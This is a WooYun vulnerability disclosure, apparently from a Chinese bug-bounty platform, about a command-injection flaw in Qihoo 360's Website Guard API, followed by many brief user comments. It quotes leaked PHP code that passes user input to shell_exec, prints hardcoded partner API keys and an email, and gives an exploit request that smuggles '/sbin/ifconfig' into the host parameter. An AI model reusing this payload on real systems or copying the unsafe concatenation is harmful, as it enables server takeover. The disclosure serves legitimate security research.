当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(140) 关注此漏洞

缺陷编号: WooYun-2015-141929

漏洞标题: 神器之奇虎360某命令执行导致网站卫士等多个重要业务官网可getshell(可能影响接入站长)

相关厂商: 奇虎360

漏洞作者: 举起手来

提交时间: 2015-09-18 12:55

公开时间: 2015-11-02 18:06

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 远程命令执行

18人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-18: 细节已通知厂商并且等待厂商处理中
2015-09-18: 厂商已经确认,细节仅向厂商公开
2015-09-28: 细节向核心白帽子及相关领域专家公开
2015-10-08: 细节向普通白帽子公开
2015-10-18: 细节向实习白帽子公开
2015-11-02: 细节向公众公开

简要描述:

RT

详细说明:

上回书中说到的代码泄露中涉及api.wangzhan.360.cn



那么我们来对关键代码简单审计下,为了保护企业的代码,只取部分关键代码

code 区域
//清除缓存


        //$query = "/data1/traslave_cli 127.0.0.1 purge {$domain_name}";


        //$query = "/data1/traslave_cli 211.151.122.201 purge {$this->domain_name}";


	if ("*" == $this->host || "@" == $this->host) {


                $clear_host = $this->domain_name;


        } else {


                $clear_host = $this->host.".".$this->domain_name;


        }


        $query = "/data1/traslave_cli 211.151.122.201 purge ".$clear_host;


        $result = shell_exec($query);


        error_log($query."\n", 3, $this->api_log_file);


        error_log("result=".$result."\n", 3, $this->api_log_file);


        if (strcmp("OK", trim($result)) == 0) {


            $this->res = array("status"=>array("code"=>OPERATE_SUCCESS, "message"=>"operation succeed"));


        } else {


            $this->res = array("status"=>array("code"=>OPERATE_FAILED, "message"=>"operation failed"));


        }





我们看到这里有一个拼接的命令执行。



那么需要怎么触发呢,首先需要找到执行这个api的方法及权限。





执行方法在官方文档中有详细说明:

http://wangzhan.360.cn/guide/api



那关键就是如何找一个api的授权key:

1、申请一个,显然不科学

2、找个合作伙伴,把他们的api权限搞到手,显然很曲折

3、看下官方是否有示例权限





然后我就翻了一下官方给的sdk,果然找到了;



code 区域
config.php 


<?php 


//-----------------------不可修改-----------------------------------


//网站卫士授权账号和密钥


define('MID', '360test'); //授权账号


define('VKEY', 'ca6f55ce981bde2a2fb145686df0d46d');


//define('VKEY', 'ca6f55ce981bde2a2fb145686df0d46d'); //授权key





//保护状态定义


define('OPEN_PROTECT', 1); //开启保护


define('CLOSE_PROTECT', 2); //关闭保护








//---------------------------可修改------------------------


//网站所有者信息


define('OWNER_MARK', 'sunday');           //网站所有者唯一标识


define('OWNER_EMAIL', 'liwenhua@360.cn'); //网站所有者邮箱





//接入类型(请参看文档)


define('JOIN_TYPE', 'ip');


define('DATA', '1.1.1.1');





但是...竟然是一个无效的,擦啊



我再翻啊翻.。。



code 区域
➜  wangzhan_api  cat include/apiAuth.class.php 


<?php


require_once(dirname(__FILE__)."/config.inc.php");


require_once(dirname(__FILE__)."/mysql.class.php");


class apiAuth {





	private $_authkey = array(


		'360test' => array('pkey' => 'fe4a809393132148275c72335abba5b8'), //测试专用账号


                'shopex'  => array('pkey' => '5c25061f20b打码c01e6870e51'), //shopex


                'west263' => array('pkey' => 'fe4a80939313打码5abba5b7'), //西数





。。。省略很多





这个开发是个好人,把key写到代码里了,尼玛。接下来就是构造请求来执行命令了



host和domain_name 都可以啦。



code 区域
http://api.wangzhan.360.cn/wprotect.php?act=cleancache





mid=360test&vkey=68130a53433b1672fb0107eb6089da50&owner_mark=sunday&owner_email=liwenhua@360.cn&domain_name=test02.com&host=www;/sbin/ifconfig;&domain_type=cname





漏洞证明:

漏洞影响:api.wangzhan.360.cn 对应的服务器和wangzhan.360.cn都是一个服务器集群,所以直接也可以影响网站卫士官网。



D68E78E4-DFFC-4CFC-89AB-521E195A71B1.png





然后木有深入,你们懂的。网站卫士几万站长咩。

修复方案:

上线前安全测试

版权声明:转载请注明来源 举起手来@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-18 18:04

厂商回复:

感谢反馈,相关业务已紧急修复此问题。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
0%
100%
0%
0%
0%

评价

  1. 2015-09-18 12:55 | 故滨 ( 普通白帽子 | Rank:311 漏洞数:40 )
    0

    举起手来

    1# 回复此人
  2. 2015-09-18 12:59 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)
    1

    so屌

    2# 回复此人
  3. 2015-09-18 13:01 | scanf ( 核心白帽子 | Rank:1457 漏洞数:207 | 。)
    0

    好可怕

    3# 回复此人
  4. 2015-09-18 13:02 | range ( 普通白帽子 | Rank:166 漏洞数:37 | 这个人有点懒,没有写个人简介)
    0

    好怕怕

    4# 回复此人
  5. 2015-09-18 13:06 | 不会游泳的鱼 ( 普通白帽子 | Rank:171 漏洞数:56 | 非著名白帽子)
    0

    吓死宝宝了

    5# 回复此人
  6. 2015-09-18 13:13 | Yuku ( 实习白帽子 | Rank:54 漏洞数:26 | 数据挖掘)
    0

    吓死宝宝了

    6# 回复此人
  7. 2015-09-18 13:15 | M4sk ( 普通白帽子 | Rank:1218 漏洞数:323 | 啥都不会....)
    0

    好可怕

    7# 回复此人
  8. 2015-09-18 13:26 | ago ( 普通白帽子 | Rank:600 漏洞数:97 | long long ago,I'm an angry bird.)
    0

    吓死宝宝了

    8# 回复此人
  9. 2015-09-18 13:38 | 岩少 ( 普通白帽子 | Rank:658 漏洞数:181 | 破晓团队)
    0

    略屌。。。。思路好屌。

    9# 回复此人
  10. 2015-09-18 13:43 | 举起手来 ( 核心白帽子 | Rank:1701 漏洞数:185 | 准备好,举起手来!)
    0

    @岩少 搞的像你看过内容一样?

    10# 回复此人
  11. 2015-09-18 13:50 | wps2015 ( 普通白帽子 | Rank:612 漏洞数:81 | 不叫一日荒废)
    0

    恐怖如斯~

    11# 回复此人
  12. 2015-09-18 14:06 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)
    0

    360官网getshell?这个标题太屌了!大片!!

    12# 回复此人
  13. 2015-09-18 14:32 | lufsy ( 实习白帽子 | Rank:41 漏洞数:12 | 自由,分享,共进)
    0

    @举起手来 要不要这么吊啊。。。你的神器呢?

    13# 回复此人
  14. 2015-09-18 14:37 | feiyu ( 普通白帽子 | Rank:112 漏洞数:29 )
    0

    14# 回复此人
  15. 2015-09-18 14:38 | 乌云白帽子 ( 路人 | Rank:19 漏洞数:8 | 路人甲)
    3

    不就是个命令执行么、有什么屌的。还没有上次我直接去机房关服务器屌!

    15# 回复此人
  16. 2015-09-18 14:42 | 360 ( 路人 | Rank:10 漏洞数:4 | 你是我的什么?我是你的安全卫士啊!)
    0

    都让开!!!

    16# 回复此人
  17. 2015-09-18 14:51 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)
    0

    @360 ÷1.44 = ?

    17# 回复此人
  18. 2015-09-18 15:00 | Master ( 实习白帽子 | Rank:33 漏洞数:10 )
    0

    得以噢

    18# 回复此人
  19. 2015-09-18 15:12 | backda0 ( 普通白帽子 | Rank:212 漏洞数:43 | none)
    0

    看看乌云都有哪些货也在补天上混··

    19# 回复此人
  20. 2015-09-18 15:45 | 大亮 ( 普通白帽子 | Rank:359 漏洞数:70 | 慢慢挖洞)
    0

    吓死本宝宝了

    20# 回复此人
  21. 2015-09-18 15:46 | 岩少 ( 普通白帽子 | Rank:658 漏洞数:181 | 破晓团队)
    0

    @举起手来 哈哈,慷慨一下。。

    21# 回复此人
  22. 2015-09-18 15:58 | Herolon ( 普通白帽子 | Rank:270 漏洞数:59 | ******)
    0

    o

    22# 回复此人
  23. 2015-09-18 16:21 | 动感超人 ( 实习白帽子 | Rank:46 漏洞数:11 | 小心动感光波)
    0

    吓死本宝宝了

    23# 回复此人
  24. 2015-09-18 16:31 | 虾米 ( 普通白帽子 | Rank:105 漏洞数:13 )
    0

    吓死娃娃了

    24# 回复此人
  25. 2015-09-18 17:00 | 江南疯子 ( 实习白帽子 | Rank:42 漏洞数:10 | 多提漏洞)
    0

    牛BB......

    25# 回复此人
  26. 2015-09-18 17:03 | B1acken ( 普通白帽子 | Rank:175 漏洞数:57 | 渣渣)
    0

    略吊

    26# 回复此人
  27. 2015-09-18 17:35 | AuGe ( 普通白帽子 | Rank:107 漏洞数:16 | I'm coming)
    0

    已关注

    27# 回复此人
  28. 2015-09-18 17:53 | 金枪银矛小霸王 ( 普通白帽子 | Rank:141 漏洞数:29 | 不会挖洞洞的猿猿不是好学生)
    0

    @乌云白帽子 就你会吹牛逼

    28# 回复此人
  29. 2015-09-18 17:57 | 蓝天 ( 普通白帽子 | Rank:428 漏洞数:102 | 互联网上拾破烂的胖子)
    0

    围观大神

    29# 回复此人
  30. 2015-09-18 18:07 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:22 | 当我又回首一切,这个世界会好吗?)
    0

    30分啊

    30# 回复此人
  31. 2015-09-18 20:44 | 小红猪 ( 普通白帽子 | Rank:322 漏洞数:58 | little red pig!)
    0

    牛逼

    31# 回复此人
  32. 2015-09-20 10:42 | Sai、 ( 路人 | Rank:14 漏洞数:4 | for fun……)
    0

    吓死宝宝了,占个坑先

    32# 回复此人
  33. 2015-11-02 22:42 | 子非墨 ( 实习白帽子 | Rank:45 漏洞数:8 | 一念成佛 一念成魔)
    0

    流弊哄哄~

    33# 回复此人
  34. 2015-11-03 08:47 | BeenQuiver ( 普通白帽子 | Rank:103 漏洞数:27 | 专注而高效,坚持好的习惯千万不要放弃)
    0

    吊炸天

    34# 回复此人
  35. 2015-11-03 10:17 | 神刀 ( 路人 | Rank:23 漏洞数:3 | www.shellsec.com内射那么牛,虾米没妹子?)
    0

    吓死宝宝了

    35# 回复此人

登录后才能发表评论,请先 登录